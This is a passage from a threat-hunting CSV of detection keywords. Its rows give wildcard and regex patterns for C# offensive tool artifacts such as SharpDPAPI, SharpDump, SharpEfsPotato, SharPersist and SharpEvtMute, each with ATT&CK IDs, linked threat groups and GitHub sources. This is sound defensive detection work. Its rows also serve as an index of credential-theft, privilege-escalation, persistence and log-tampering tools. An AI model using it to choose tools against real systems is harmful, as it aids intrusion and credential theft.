T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58916" "*SharpDPAPI completed in 
*",".{0,1000}SharpDPAPI\scompleted\sin\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58917" "*SharpDPAPI completed in *",".{0,1000}SharpDPAPI\scompleted\sin\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58918" "*SharpDPAPI*",".{0,1000}SharpDPAPI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58919" "*SharpDPAPI* credentias *",".{0,1000}SharpDPAPI.{0,1000}\scredentias\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58920" "*SharpDPAPI* vaults *",".{0,1000}SharpDPAPI.{0,1000}\svaults\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58921" "*SharpDPAPI.Commands.*",".{0,1000}SharpDPAPI\.Commands\..{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58922" "*SharpDPAPI.csproj*",".{0,1000}SharpDPAPI\.csproj.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58923" "*SharpDPAPI.Domain*",".{0,1000}SharpDPAPI\.Domain.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58924" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58925" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58926" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58927" "*SharpDPAPI.Helpers.*",".{0,1000}SharpDPAPI\.Helpers\..{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58928" 
"*SharpDPAPI.ps1*",".{0,1000}SharpDPAPI\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58929" "*SharpDPAPI.sln*",".{0,1000}SharpDPAPI\.sln.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58930" "*SharpDPAPI.txt*",".{0,1000}SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58931" "*sharpDPAPI_masterkeysToClipboard*",".{0,1000}sharpDPAPI_masterkeysToClipboard.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","58932" 
"*SharpDPAPIMachine*.cs",".{0,1000}SharpDPAPIMachine.{0,1000}\.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58933" "*SharpDPAPI-master*",".{0,1000}SharpDPAPI\-master.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58934" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58935" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58936" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58937" "*SharpDXWebcam*",".{0,1000}SharpDXWebcam.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","N/A","8","1","87","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z","58938" "*sharpedrchecker*",".{0,1000}sharpedrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - 
T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58939" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58940" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58941" "*SharpEDRChecker.Program*",".{0,1000}SharpEDRChecker\.Program.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - 
TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58942" "*SharpEDRChecker/releases*",".{0,1000}SharpEDRChecker\/releases.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58943" "*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58944" "*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58945" "*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 
- T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58946" "*SharpEfsPotato.cs*",".{0,1000}SharpEfsPotato\.cs.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58947" "*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58948" "*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58949" "*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - 
T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58950" "*SharpEfsPotato.sln*",".{0,1000}SharpEfsPotato\.sln.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58951" "*SharpEfsPotato-master*",".{0,1000}SharpEfsPotato\-master.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58952" "*SharpEfsTriggeEfs.exe*",".{0,1000}SharpEfsTriggeEfs\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","58953" "*SharPersist -*",".{0,1000}SharPersist\s\-.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58954" "*SharPersist*",".{0,1000}SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in 
C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58955" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58956" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58957" "*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58958" "*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58959" "*SharpEventLoader.exe*",".{0,1000}SharpEventLoader\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58960" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode 
from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58961" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58962" 
"*SharpEventPersist.exe*",".{0,1000}SharpEventPersist\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58963" "*SharpEventPersist-main*",".{0,1000}SharpEventPersist\-main.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58964" "*SharpEvtMute.cs*",".{0,1000}SharpEvtMute\.cs.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58965" "*SharpEvtMute.exe*",".{0,1000}SharpEvtMute\.exe.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58966" "*SharpEvtMute.pdb*",".{0,1000}SharpEvtMute\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - 
